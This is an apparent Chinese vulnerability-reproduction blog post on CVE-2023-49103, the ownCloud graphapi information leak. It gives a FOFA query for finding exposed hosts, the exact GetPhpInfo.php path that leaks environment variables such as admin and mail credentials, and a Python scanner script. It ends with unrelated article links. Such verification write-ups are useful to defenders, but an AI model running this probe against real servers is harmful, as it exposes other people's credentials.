EternalStarCity
EternalStarCity

【CVE-2023-49103】ownCloud graphapi信息泄露漏洞(2023年11月发布)

漏洞简介

ownCloud owncloud/graphapi 0.2.x在0.2.1之前和0.3.x在0.3.1之前存在漏洞。graphapi应用程序依赖于提供URL的第三方GetPhpInfo.php库。当访问此URL时,会显示PHP环境的配置详细信息(phpinfo)。此信息包括Web服务器的所有环境变量,包括敏感数据,如ownCloud管理员密码、邮件服务器凭据和许可证密钥。

漏洞等级 高危
影响版本

ownCloud/graphapi 0.2.x < 0.2.1

ownCloud/graphapi 0.3.x < 0.3.1
漏洞类型 信息泄露

产品简介    

 OwnCloud 是一个开源的私有云存储/网盘项目,OwnCloud 跨平台支持 Windows、Mac、Android、iOS、Linux 等平台,而且还提供了「网页版」以及 WebDAV 形式访问,因此你几乎可以在任何电脑、手机设备上都能轻松获取和访问你的文件文档,从而实现跨平台跨设备文件同步、共享、版本控制、团队协作等功能。

网络测绘

FOFA:app="ownCloud"

漏洞复现

手动验证POC

ip:port/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
 
  
注意:当url存在/owncloud/时,poc需要将该路径保留【CVE-2023-49103】ownCloud graphapi信息泄露漏洞(2023年11月发布)_第1张图片
 
  
即POC为
 
  
ip:port/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
 
  
python扫描验证脚本
 
  
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
@Project :漏洞复现POC 
@File    :【CVE-2023-49103】ownCloud graphapi信息泄露漏洞.py
@Author  :星之尘
@Date    :2023/11/28 15:24 
@脚本说明:
"""
import requests
from requests import Timeout
from urllib3.exceptions import InsecureRequestWarning
headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
        }

def verification(url):
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url
    path1 = "/index.php/login"
    path2 = "/owncloud/index.php/login"
    encodetext1 = url + path1
    encodetext2 = url + path2
    finger_url = [encodetext2, encodetext1]
    for url in finger_url:
        req1 = requests.get(url, headers=headers, verify=False, timeout=20)
        if "ownCloud" in req1.text:
            return url
    return False
def scan():
    verification_url = verification(url)
    print(f"扫描目标: {verification_url}")
    print("---------------------------------------------------")

    try:
        if "owncloud" in verification_url:
            exp_path = "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
        else:
            exp_path = "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
        exp=url + exp_path
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req2 = requests.post(exp, headers=headers, verify=False, timeout=20)
        if req2.status_code == 200 and "phpinfo()" in req2.text:
            print(f"[+] {url} !!!存在【CVE-2023-49103】ownCloud graphapi信息泄露漏洞!!!;")
        else:
            print(f"[-] {url} 不存在【CVE-2023-49103】ownCloud graphapi信息泄露漏洞")
    except Timeout:
        print(f"[!] 请求超时,跳过URL: {url}", "yellow")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            print(f"[-] {url} 证书校验错误或者证书被拒绝")
        else:
            print(str(e))


if __name__ == "__main__":
    url = "your ip:port"
    verification(url)
    scan()
 
  
 
 
 


                            

                        

                    

                    
                    

                    
                    
                    

                

                

                    
                

            

        

    

    

        
你可能感兴趣的:(最新漏洞追踪与复现,安全,python,网络安全)

        

            

                
    
                    
  • FTP考点
                        之凹の鸥
笔记
                        
    在网络工程师、运维工程师、系统管理员等岗位的面试中,FTP(FileTransferProtocol,文件传输协议)是基础但高频的考点,尤其在涉及文件共享、数据传输、服务器管理等场景中。以下是系统化的核心考点梳理,涵盖FTP基础概念、工作模式、安全特性及应聘高频问题。一、FTP基础考点1.FTP的核心概念(必会)(1)FTP的定义与作用定义:FTP是应用层协议,用于在客户端和服务器之间可靠地传输文
    
                    
    • 
                    
  • DNS考点
                        

                        
    在网络工程师、系统工程师、运维工程师、安全工程师等岗位的面试中,DNS(DomainNameSystem,域名系统)是高频必考知识点。DNS作为互联网的“电话簿”,负责将人类可读的域名(如www.example.com)解析为机器可识别的IP地址(如192.0.2.1),是网络通信的基础组件。以下是系统化的核心考点梳理,涵盖DNS基础概念、工作原理、协议细节及应聘高频问题。一、DNS基础考点1.D
    
                    
    • 
                    
  • 舍得让你爱的人受苦
                        北上的路上没有你

                        
    今天看了一本书《舍得让你爱的人受苦》。在书中,作者提出:有时候我们在自己的情绪模式和互动惯性的遮蔽下,会看不清楚我们和爱人、亲人、家人、好友、同事之间到底发生了什么事情。而这本书可以帮助我们穿越各种错综复杂的关系,穿越自我的障碍,通过学习如何面对自己最好以及最糟的特质,学会接纳、臣服和放手,来修复和重塑我们与亲密爱人、友人及自己之间的关系,并最终找到通往爱和幸福的路径。作者说:想幸福,要能断、舍、
    
                    
    • 
                    
  • OSPF知识
                        之凹の鸥
网络智能路由器
                        
    在网络工程师、系统工程师等岗位的面试中,OSPF(OpenShortestPathFirst,开放最短路径优先)是高频考点,尤其是对中高级网络岗位(如网络架构师、运维工程师)。以下是OSPF的核心考点和必须掌握的知识点,按优先级分类整理,帮助你高效备考:一、基础概念与核心机制OSPF的定义与特点定义:OSPF是一种基于链路状态(Link-State)的内部网关协议(IGP),用于在自治系统(AS)
    
                    
    • 
                    
  • 003无意识是如何被发现的:代表人物介绍:贾内、阿德勒
                        一米的部落格

                        
    3.1无意识是如何被发现的:代表人物介绍王浩威华人心理治疗研究发展基因会执行长;亚洲家庭治疗学会副主席;台湾心理治疗学会前会长,现任常务理事;中国精神分析事委会常务委员;国际分析协会IAAP台湾荣格心理学会主席;专长:温尼科特取向精神分析、荣格精神分析、动力心理治疗、家族婚姻治疗、青少年心理学及精神医学。弗洛伊德不是唯一发现无意识的人这本书综合了很多荣格的理论与刘旭凯、邓惠文、廖定烈、许森彦、杨逸
    
                    
    • 
                    
  • 选手曝中国好声音黑幕:不仅欺负选手,还对导师下手
                        赵志文_

                        
    已故歌手李玟抱怨《中国好歌》不公平对待的音频和节目录制现场的争吵视频曝光引起了极大关注。音频内容指的是李玟生前与《中国好歌》节目组的纠纷。在音频中,李玟反复提到“赛制有问题”,这让她非常失望。她因质疑“不公平赛制”而受到极端对待,包括被动结局、舞台坠落、镜头被剪掉等。她还提到,她在录制节目时被诊断出患有乳腺癌,但她坚持录制,因为她热爱音乐。17日晚,《中国好歌》在其官方博客上回应说,音频是“恶意剪
    
                    
    • 
                    
  • 分布式文件存储(GlusterFS) 入门指南, 有一定难度!! ubuntu
                        努力一点948
分布式gluster分布式ubuntulinux服务器运维人工智能gpu算力
                        
    以下有免费的4090云主机提供ubuntu22.04系统的其他入门实践操作地址:星宇科技|GPU服务器高性能云主机云服务器-登录相关兑换码星宇社区---4090算力卡免费体验、共享开发社区-CSDN博客兑换码要是过期了,可以私信我获取最新兑换码!!!之所以推荐给大家使用,是因为上面的云主机目前是免费使用的,不需要大家再去安装虚拟机,部署虚拟机,环境都搭配好了,非常适合新手入门,减少搭建的时间,把时
    
                    
    • 
                    
  • 路由,代理服务器和NAT技术的区别
                        

                        
    常见的局域网接入Internet的技术有三种:直接路由代理服务器(proxy)网络地址转换(NAT)一、直接路由第一种方法比较简单直接,不过要求客户机都有真实IP,仅这一点,大多数的环境就无法满足–IP地址可是紧缺资源哦。而且一台硬件路由器的价格不斐,真实IP挂在网上安全上也让人不放心。所以这种方案应用得不多。二、代理服务器代理服务器(ProxyServer)是一种重要的服务器安全功能,它的工作主
    
                    
    • 
                    
  • Java Web项目Dump文件分析指南
                        

                        
    目录1.Dump文件的类型与作用2.生成Dump文件的方法3.分析Dump文件的工具4.分析步骤与常见问题解决5.最佳实践与预防在JavaWeb项目中,dump文件是JVM(Java虚拟机)在发生崩溃、内存溢出或特定事件时生成的内存快照文件,用于诊断性能问题、内存泄漏或线程死锁。这些文件通常分为堆转储(heapdump)和线程转储(threaddump)。堆转储记录对象内存分配情况,而线程转储捕捉
    
                    
    • 
                    
  • 读《小学教师与民主运动》有感
                        红领巾旳小辫子

                        
    本周拜读的是陶行知文集中的《小学教师与民主运动》一文,真的是令我感慨万千。其中令我印象深刻的是先生在文中提到的六大解放:一、解放他的头脑,使他能想;二、解放他的双手,使他能干;三、解放他的眼睛,使他能看;四、解放他的嘴,使他能谈;五、解放他的空间,使他能到大自然大社会里去取得更丰富的学问;六、解放他的时间,不把他的功课表填满,不逼迫他赶考,不和家长联合起来在功课上夹攻。即使是放在现在课堂教学中,也
    
                    
    • 
                    
  • 281129-李晏林-2022/12/6【day56】
                        尘心_aa8c

                        
    学《于敏洪案例》第五天今天听民于敏洪案例,学了今天感觉有点疲惫,在听课过程中最大的促动还是在于每天及时送自己鼓励,这件事情,有再做没做好,也没做好精准的数据统计,不养成习惯,对于自己来说会成很大问题,可能这个学这个课程一结束,没过多久这方法就被自己忘于脑后。先给自己制定确实可量化的指标,刚开始,先给自己送20个鼓励,每完成5个做次记录。鼓励分为明的鼓励,与自我暗示。学习于敏洪案例的本质是什么?从于
    
                    
    • 
                    
  • 洛阳16家亲子鉴定机构中心地址一览(附2024年鉴定中心地址)
                        国医基因李主任

                        
    洛阳亲子鉴定机构中心地址在哪里?在洛阳做亲子鉴定肯定到自己所居住地区的亲子鉴定中心做比较好,出行方便。知识大有用,专家在身边,洛阳国医基因,为您提供专业的DNA亲子鉴定知识与咨询服务。地址位于:洛阳市涧西区景华路24号。其中个人亲子鉴定收费标准为2200-2600元左右一次,司法亲子鉴定收费标准为2400-3600元一次,无创亲子鉴定收费标准为4500-5000元一次;洛阳16家亲子鉴定机构中心地
    
                    
    • 
                    
  • 推进中国特色社会主义文化建设 建设中华民族现代文明
                        嘻嘻123

                        
    2023年6月2日,中共中央总书记、国家主席、中央军委主席习近平在北京出席文化传承发展座谈会并发表重要讲话。会上强调:一是深刻把握中华文明的突出特性。中华文明具有突出的连续性。中华文明是世界上唯一绵延不断且以国家形态发展至今的伟大文明。中华文明的连续性,从根本上决定了中华民族必然走自己的路。中华文明具有突出的创新性。中华文明是革故鼎新、辉光日新的文明,静水深流与波澜壮阔交织。中华文明具有突出的统一
    
                    
    • 
                    
  • (有些饮食可以减压)中原焦点团队杨小杰坚持分享第595天2022-4-12
                        yxjlady

                        
    吃什么食物能减压,减压的12种食物。人的精力与体力所需要的能量来源是食物,研究发现很多食物都可以有效地减少压力:1、香蕉香蕉真的很奇妙,是简单就可以获得能量的食物。觉得精神不济的时候,特别是下午需要活力的时候,请食用香蕉。2、杏仁当身处一片混乱中的你快要抓狂时,先抓一把大杏仁尝尝。杏仁富含维生素E,一种可增强免疫力的抗氧化物。杏仁还含维生素B,有助于你面对异常糟糕的事件,每天吃大约四分之一杯杏仁可
    
                    
    • 
                    
  • Java 性能调优实战:JVM 参数配置与 GC 日志分析
                        

                        
    Java性能调优实战:JVM参数配置与GC日志分析(10000字)一、Java性能调优的核心概念在现代企业级应用中,Java应用的性能直接影响用户体验、系统吞吐量以及资源利用率。因此,Java性能调优成为开发和运维团队的重要任务。性能调优的核心目标是提升应用的响应速度、减少延迟、优化资源使用,并确保系统在高并发环境下保持稳定。Java应用的性能优化涉及多个层面,包括代码优化、数据库访问优化、网络通
    
                    
    • 
                    
  • 荆门地区亲子鉴定收费费用标准大全(附2024年最新报价)
                        国医基因陈主任

                        
    荆门地区亲子鉴定多少钱费用?荆门地区dna亲子鉴定收费费用标准在2000元到5000元之间不等,亲子鉴定按(鉴定用途、鉴定对象)大致可分为:司法亲子鉴定、个人亲子鉴定、无创胎儿亲子鉴定;荆门地区亲子鉴定中心收费标准如下:荆门国医基因亲子鉴定中心地址:荆门市象山大道67号1、荆门地区个人亲子鉴定费用:2000元-2600元元,一般3-7天出结果;2、荆门地区司法亲子鉴定费用:2600元-3200元元
    
                    
    • 
                    
  • Agent架构与工作原理:理解智能体的核心机制
                        hdzw20
agent学习ai机器学习agent智能体
                        
    Agent架构与工作原理:深入理解智能体的核心机制AIAgent的核心组成部分一个完整的AIAgent通常由以下几个核心模块组成:1.规划模块(PlanningModule)规划模块是Agent的"大脑",负责制定行动策略。它接收目标任务,分析当前状态,并制定一系列行动计划。规划可以是:短期规划:针对当前步骤的即时决策长期规划:面向整体目标的战略性规划动态规划:根据执行结果实时调整计划2.记忆模块
    
                    
    • 
                    
  • MySQL索引机制解析:B+树、索引类型与优化策略
                        hdzw20
mysql复习mysqlb树数据库
                        
    MySQL索引机制解析:B+树、索引类型与优化策略索引是MySQL数据库中提高查询效率的关键。深入理解索引的底层机制、不同类型及其优化策略,对于数据库性能调优和面试准备都至关重要。本文将围绕B+树、聚簇索引与非聚簇索引、索引下推、覆盖索引以及自适应哈希索引等核心概念进行阐述。1.B+树vsB树:为何MySQL选择B+树?B树(B-tree)和B+树(B±tree)都是常用的多路平衡查找树,它们旨在
    
                    
    • 
                    
  • MySQL存储引擎核心:了解Buffer Pool与Page管理机制
                        hdzw20
mysql数据库
                        
    MySQL存储引擎核心:了解BufferPool与Page管理机制1.BufferPool:数据库的高速缓存1.1基本概念作用:缓存表数据与索引数据,减少磁盘IO组成:缓存数据页(Page,默认16KB)控制块(约800字节,记录表空间、页号、缓存页地址等)默认大小:128MB(控制块额外占用约5%内存)1.2工作流程查询过程:通过哈希表(Key=表空间号+页号)判断页是否在BufferPool缓
    
                    
    • 
                    
  • Python训练 + Go优化 + C#部署:端到端AI模型的跨语言实践
                        威哥说编程
人工智能学习资料库pythongolangc#
                        
    在现代AI应用中,如何高效地训练、优化、并最终部署AI模型是一项复杂且具有挑战性的任务。在这一过程中,选择合适的编程语言和工具可以显著提高效率和系统的性能。Python作为AI领域的主流语言,具有丰富的深度学习框架(如PyTorch和TensorFlow),在模型训练方面处于领先地位。然而,针对计算密集型任务(如数据预处理、加密等),Go语言因其高效的并发处理和出色的性能,成为优化计算的理想选择。
    
                    
    • 
                    
  • 手机兼职平台正规app有哪些?用手机做的正规兼职
                        古楼

                        
    很多用户想在自己空闲的时候找一份兼职的工作来赚一些零花钱,今天小编就来介绍一下找兼职哪个app靠谱2022,以方便用户们更快的找到一款合适的找兼职工作app。用户可以根据自己的需求下载不同的兼职app,以下是最新能找靠谱兼职的app前十名。1、高省app使用【高省app】网购,更便宜更划算!高省app上每天都有大额内部优惠券,还有返利佣金,而且高省的返利佣金在全网超高的!手机应用商城搜索【高省】直
    
                    
    • 
                    
  • Java注解家族--`@ResponseBody`
                        

                        
    @ResponseBody@ResponseBody是Spring框架中的一个注解,在基于Spring的Web开发中扮演着重要角色,以下是对它的详细总结:1.定义与基本功能定义:@ResponseBody注解用于将Controller方法的返回值,通过适当的HttpMessageConverter转换为指定格式后写入HTTP响应体中返回给客户端。它可以应用在方法上,也可以用在类上(当用在类上时,表
    
                    
    • 
                    
  • python排序算法之桶排序
                        华强笔记
python数据结构和算法python算法
                        
    桶排序主要适用于全是数字的列表排序代码如下:defbuckrt_sort(li,n=100,max_num=10000):bucket=[[]for_inrange(n)]
    
                    
    • 
                    
  • 20180722【剽悍行动营8】DAY1 嘉宾分享——赵周《碎片化时代你最缺的知识管理五招》
                        英娟儿

                        
    补课五、自己学习后的五个收获:1.区分两类知识管理:追求知识本身;追求致用与成长。2.便签学习法的三个维度:A用自己的语言重述信息(理解)A1描述自己相关经验(内化)A2规划自己的目标与行动3.一切不改变行动的知识管理都是浪费。也就是说,不管是何种知识管理,都要以行动为目的。4.信息和知识的区别,又一次听到这两个概念的区别。5.构建知识体系是知识管理的最高境界。三、自己需要改善的(三个方面):1.
    
                    
    • 
                    
  • 【PGCCC】Postgres 18 Beta 版发布:您应该了解的 7 个功能
                        PGCCC-PostgeSQL培训认证
postgresql
                        
    Postgres18Beta1刚刚发布。与之前的主要版本一样,此Beta版本包含所有计划正式发布的功能的预览版。您可以阅读发行说明来了解完整的更新列表,但我们将在本文中重点介绍一些更新亮点。Postgres18中的新功能异步I/OPostgres18最令人兴奋的功能之一是引入了全新的异步I/O子系统。此前,Postgres中的所有I/O都是同步的:每次读取都会阻塞查询执行,直到数据到达。而使用异步
    
                    
    • 
                    
  • MySQL新建用户与授权
                        守优

                        
    方法一:mysql>insertintomysql.user(Host,User,Password)values("localhost","zhangs",password("123456"));mysql>flushprivileges;解释:这样就创建了一个用户名为zhangs,密码为123456的数据库用户;此处的"localhost",是指该用户只能在本地登录,不能在另外一台机器上远程登录
    
                    
    • 
                    
  • 常见Hash算法
                        LUCIAZZZ
算法哈希算法javaspringboot操作系统spring密码学
                        
    部分内容来源:JavaGuide什么是Hash算法哈希算法也叫散列函数或摘要算法,它的作用是对任意长度的数据生成一个固定长度的唯一标识也叫哈希值、散列值或消息摘要哈希算法的是不可逆的,你无法通过哈希之后的值再得到原值哈希值的作用是可以用来验证数据的完整性和一致性哈希算法可以简单分为两类:加密哈希算法:安全性较高的哈希算法,它可以提供一定的数据完整性保护和数据防篡改能力,能够抵御一定的攻击手段,安全
    
                    
    • 
                    
  • HTTP,HTTPS
                        之凹の鸥
httphttps网络协议
                        
    在网络工程师、开发工程师、运维工程师等岗位的面试中,HTTP/HTTPS是高频必考知识点,尤其在前端、后端、测试、DevOps等与网络通信相关的职位中。以下是系统化的核心考点梳理,涵盖基础概念、协议机制、安全特性及应聘高频问题。一、HTTP基础1.HTTP的核心概念(1)HTTP的定义与作用定义:HTTP(HyperTextTransferProtocol,超文本传输协议)是应用层协议,用于在客户
    
                    
    • 
                    
  • 标记语言---XML
                        MzKyle
标记语言xmljava前端
                        
    一、XML的定义与核心定位XML(ExtensibleMarkupLanguage,可扩展标记语言)是由万维网联盟(W3C)于1998年2月发布的一种标记语言,其核心设计目标是传输和存储数据,而非直接用于显示数据(这一点与HTML有本质区别)。XML的“可扩展性”体现在:它没有预定义标签,用户可以根据需求自定义标签,只要遵循语法规则即可。这种灵活性使其成为跨平台、跨系统数据交换的重要标准,广泛应用
    
                    
    • 
                    
  • 汕头8家权威亲子鉴定亲子鉴定中心大全(附2024年最新办理指南)
                        国医基因张主任

                        
    汕头市哪些鉴定中心可以做亲子鉴定?汕头市国医基因可以做亲子鉴定,咨询地址在汕头市金平区外马路2号。今天小编整理了汕头市能做亲子鉴定的一些地方,排名不分先后,注:各鉴定中心的鉴定类别不同。请根据自身情况和鉴定咨询的经营范围进行选择。内容仅供参考。汕头市可以做亲子鉴定的地址如下:汕头8家权威亲子鉴定亲子鉴定中心大全(附2024年最新办理指南)汕头做亲子鉴定的正规机构1、汕头国医基因亲子鉴定咨询中心(国
    
                    
    • 
                                
  • 异常的核心类Throwable
                                    无量
java源码异常处理exception
                                    
    java异常的核心是Throwable,其他的如Error和Exception都是继承的这个类 里面有个核心参数是detailMessage,记录异常信息,getMessage核心方法,获取这个参数的值,我们可以自己定义自己的异常类,去继承这个Exception就可以了,方法基本上,用父类的构造方法就OK,所以这么看异常是不是很easy 
 
 
 
package com.natsu;



    
                                
    • 
                                
  • mongoDB 游标(cursor) 实现分页 迭代
                                    开窍的石头
mongodb
                                    
    上篇中我们讲了mongoDB 中的查询函数,现在我们讲mongo中如何做分页查询 
 
     如何声明一个游标 
       var mycursor = db.user.find({_id:{$lte:5}}); 
      迭代显示游标数
    
                                
    • 
                                
  • MySQL数据库INNODB 表损坏修复处理过程
                                    0624chenhong
tomcatmysql
                                    
    最近mysql数据库经常死掉,用命令net stop mysql命令也无法停掉,关闭Tomcat的时候,出现Waiting for N instance(s) to be deallocated 信息。查了下,大概就是程序没有对数据库连接释放,导致Connection泄露了。因为用的是开元集成的平台,内部程序也不可能一下子给改掉的,就验证一下咯。启动Tomcat,用户登录系统,用netstat -
    
                                
    • 
                                
  • 剖析如何与设计人员沟通
                                    不懂事的小屁孩
工作
                                    
    最近做图烦死了,不停的改图,改图……。烦,倒不是因为改,而是反反复复的改,人都会死。很多需求人员不知该如何与设计人员沟通,不明白如何使设计人员知道他所要的效果,结果只能是沟通变成了扯淡,改图变成了应付。 
 
那应该如何与设计人员沟通呢? 
 
我认为设计人员与需求人员先天就存在语言障碍。对一个合格的设计人员来说,整天玩的都是点、线、面、配色,哪种构图看起来协调;哪种配色看起来合理心里跟明镜似的,
    
                                
    • 
                                
  • qq空间刷评论工具
                                    换个号韩国红果果
JavaScript
                                    
    

var a=document.getElementsByClassName('textinput');
					var b=[];
					for(var m=0;m<a.length;m++){
						if(a[m].getAttribute('placeholder')!=null)
							b.push(a[m])
					}
					var l
    
                                
    • 
                                
  • S2SH整合之session
                                    灵静志远
springAOPstrutssession
                                    
    错误信息: 
Caused by: org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cartService': Scope 'session' is not active for the current thread; consider defining a scoped
    
                                
    • 
                                
  • xmp标签
                                    a-john
标签
                                    
    今天在处理数据的显示上遇到一个问题: 
var html = '<li><div class="pl-nr"><span class="user-name">' + user
           + '</span>' + text + '</div></li>';
ulComme
    
                                
    • 
                                
  • Ajax的常用技巧(2)---实现Web页面中的级联菜单
                                    aijuans
Ajax
                                    
    在网络上显示数据,往往只显示数据中的一部分信息,如文章标题,产品名称等。如果浏览器要查看所有信息,只需点击相关链接即可。在web技术中,可以采用级联菜单完成上述操作。根据用户的选择,动态展开,并显示出对应选项子菜单的内容。 在传统的web实现方式中,一般是在页面初始化时动态获取到服务端数据库中对应的所有子菜单中的信息,放置到页面中对应的位置,然后再结合CSS层叠样式表动态控制对应子菜单的显示或者隐
    
                                
    • 
                                
  • 天-安-门,好高
                                    atongyeye
情感
                                    
        我是85后,北漂一族,之前房租1100,因为租房合同到期,再续,房租就要涨150。最近网上新闻,地铁也要涨价。算了一下,涨价之后,每次坐地铁由原来2块变成6块。仅坐地铁费用,一个月就要涨200。内心苦痛。 
 
    晚上躺在床上一个人想了很久,很久。 
   
    我生在农
    
                                
    • 
                                
  • android 动画
                                    百合不是茶
android透明度平移缩放旋转
                                    
    android的动画有两种  tween动画和Frame动画 
  
tween动画;,透明度,缩放,旋转,平移效果 
  
Animation   动画 
AlphaAnimation 渐变透明度 
RotateAnimation 画面旋转 
ScaleAnimation 渐变尺寸缩放 
TranslateAnimation 位置移动 
Animation
    
                                
    • 
                                
  • 查看本机网络信息的cmd脚本
                                    bijian1013
cmd
                                    
    @echo 您的用户名是:%USERDOMAIN%\%username%>"%userprofile%\网络参数.txt"
@echo 您的机器名是:%COMPUTERNAME%>>"%userprofile%\网络参数.txt"
@echo ___________________>>"%userprofile%\
    
                                
    • 
                                
  • plsql 清除登录过的用户
                                    征客丶
plsql
                                    
    tools---preferences----logon history---history  把你想要删除的删除 
 
 
-------------------------------------------------------------------- 
若有其他凝问或文中有错误,请及时向我指出, 
我好及时改正,同时也让我们一起进步。 
email : binary_spac
    
                                
    • 
                                
  • 【Pig一】Pig入门
                                    bit1129
pig
                                    
    Pig安装 
1.下载pig 
  
wget http://mirror.bit.edu.cn/apache/pig/pig-0.14.0/pig-0.14.0.tar.gz 
  
2. 解压配置环境变量 
  
   如果Pig使用Map/Reduce模式,那么需要在环境变量中,配置HADOOP_HOME环境变量 
  
expor
    
                                
    • 
                                
  • Java 线程同步几种方式
                                    BlueSkator
volatilesynchronizedThredLocalReenTranLockConcurrent
                                    
    为何要使用同步?       java允许多线程并发控制,当多个线程同时操作一个可共享的资源变量时(如数据的增删改查),        将会导致数据不准确,相互之间产生冲突,因此加入同步锁以避免在该线程没有完成操作之前,被其他线程的调用,        从而保证了该变量的唯一性和准确性。    1.同步方法&
    
                                
    • 
                                
  • StringUtils判断字符串是否为空的方法(转帖)
                                    BreakingBad
nullStringUtils“”
                                    
    转帖地址:http://www.cnblogs.com/shangxiaofei/p/4313111.html 
  
public static boolean isEmpty(String str)      
  判断某字符串是否为空,为空的标准是 str== 
null  
或 str.length()== 
0    
    
                                
    • 
                                
  • 编程之美-分层遍历二叉树
                                    bylijinnan
java数据结构算法编程之美
                                    
    

import java.util.ArrayList;
import java.util.LinkedList;
import java.util.List;

public class LevelTraverseBinaryTree {

    /**
     * 编程之美 分层遍历二叉树
     * 之前已经用队列实现过二叉树的层次遍历,但这次要求输出换行,因此要
    
                                
    • 
                                
  • jquery取值和ajax提交复习记录
                                    chengxuyuancsdn
jquery取值ajax提交
                                    
    
// 取值
	// alert($("input[name='username']").val());
	// alert($("input[name='password']").val());
	// alert($("input[name='sex']:checked").val());
	// alert($("
    
                                
    • 
                                
  • 推荐国产工作流引擎嵌入式公式语法解析器-IK Expression
                                    comsci
java应用服务器工作Excel嵌入式
                                    
    这个开源软件包是国内的一位高手自行研制开发的,正如他所说的一样,我觉得它可以使一个工作流引擎上一个台阶。。。。。。欢迎大家使用,并提出意见和建议。。。 
----------转帖--------------------------------------------------- 
 IK Expression是一个开源的(OpenSource),可扩展的(Extensible),基于java语言
    
                                
    • 
                                
  • 关于系统中使用多个PropertyPlaceholderConfigurer的配置及PropertyOverrideConfigurer
                                    daizj
spring
                                    
    1、PropertyPlaceholderConfigurer 
Spring中PropertyPlaceholderConfigurer这个类,它是用来解析Java Properties属性文件值,并提供在spring配置期间替换使用属性值。接下来让我们逐渐的深入其配置。 
 
基本的使用方法是:(1) 
 
<bean id="propertyConfigurerForWZ&q
    
                                
    • 
                                
  • 二叉树:二叉搜索树
                                    dieslrae
二叉树
                                    
        所谓二叉树,就是一个节点最多只能有两个子节点,而二叉搜索树就是一个经典并简单的二叉树.规则是一个节点的左子节点一定比自己小,右子节点一定大于等于自己(当然也可以反过来).在树基本平衡的时候插入,搜索和删除速度都很快,时间复杂度为O(logN).但是,如果插入的是有序的数据,那效率就会变成O(N),在这个时候,树其实变成了一个链表. 
 
tree代码: 
 

    
                                
    • 
                                
  • C语言字符串函数大全
                                    dcj3sjt126com
cfunction
                                    
    C语言字符串函数大全 
  
  
函数名: stpcpy 
功 能: 拷贝一个字符串到另一个 
用 法: char *stpcpy(char *destin, char *source); 
程序例: 
  
#include <stdio.h> 
#include <string.h> 
  
int main
    
                                
    • 
                                
  • 友盟统计页面技巧
                                    dcj3sjt126com
技巧
                                    
    在基类调用就可以了, 基类ViewController示例代码 
-(void)viewWillAppear:(BOOL)animated
{
    [super viewWillAppear:animated];
    [MobClick beginLogPageView:[NSString stringWithFormat:@"%@",self.class]];

    
                                
    • 
                                
  • window下在同一台机器上安装多个版本jdk,修改环境变量不生效问题处理办法
                                    flyvszhb
javajdk
                                    
    window下在同一台机器上安装多个版本jdk,修改环境变量不生效问题处理办法 
 
本机已经安装了jdk1.7,而比较早期的项目需要依赖jdk1.6,于是同时在本机安装了jdk1.6和jdk1.7. 
 安装jdk1.6前,执行java -version得到 
C:\Users\liuxiang2>java -version 
java version "1.7.0_21&quo
    
                                
    • 
                                
  • Java在创建子类对象的同时会不会创建父类对象
                                    happyqing
java创建子类对象父类对象
                                    
      
1.在thingking in java 的第四版第六章中明确的说了,子类对象中封装了父类对象, 
  
2."When you create an object of the derived class, it contains within it a subobject of the base class. This subobject is the sam
    
                                
    • 
                                
  • 跟我学spring3 目录贴及电子书下载
                                    jinnianshilongnian
spring
                                    
      
  一、《跟我学spring3》电子书下载地址: 
《跟我学spring3》  (1-7 和 8-13) http://jinnianshilongnian.iteye.com/blog/pdf   
  
跟我学spring3系列 word原版 下载 
  
  二、
源代码下载  
最新依
    
                                
    • 
                                
  • 第12章 Ajax(上)
                                    onestopweb
Ajax
                                    
    index.html 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
    
                                
    • 
                                
  • BI and EIM 4.0 at a glance
                                    blueoxygen
BO
                                    
    http://www.sap.com/corporate-en/press.epx?PressID=14787 
  
有机会研究下EIM家族的两个新产品~~~~ 
  
New features of the 4.0 releases of BI and EIM solutions include:  
 
  Real-time in-memory computing – 
    
                                
    • 
                                
  • Java线程中yield与join方法的区别
                                    tomcat_oracle
java
                                    
    长期以来,多线程问题颇为受到面试官的青睐。虽然我个人认为我们当中很少有人能真正获得机会开发复杂的多线程应用(在过去的七年中,我得到了一个机会),但是理解多线程对增加你的信心很有用。之前,我讨论了一个wait()和sleep()方法区别的问题,这一次,我将会讨论join()和yield()方法的区别。坦白的说,实际上我并没有用过其中任何一个方法,所以,如果你感觉有不恰当的地方,请提出讨论。 
&nb
    
                                
    • 
                                
  • android Manifest.xml选项
                                    阿尔萨斯
Manifest
                                    
    结构 
继承关系 
public final class Manifest extends Objectjava.lang.Objectandroid.Manifest 
内部类 
 
 
 class Manifest.permission权限 
 class Manifest.permission_group权限组 
 构造函数 
 
public Manifest () 详细  androi
    
                                
    • 
                                
  • Oracle实现类split函数的方
                                    zhaoshijie
oracle
                                    
    关键字:Oracle实现类split函数的方 
项目里需要保存结构数据,批量传到后他进行保存,为了减小数据量,子集拼装的格式,使用存储过程进行保存。保存的过程中需要对数据解析。但是oracle没有Java中split类似的函数。从网上找了一个,也补全了一下。 
 
CREATE OR REPLACE TYPE t_split_100 IS TABLE OF VARCHAR2(100); 
 
cr
    
                                
    • 
                

            

        

    




    

        

            按字母分类:
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他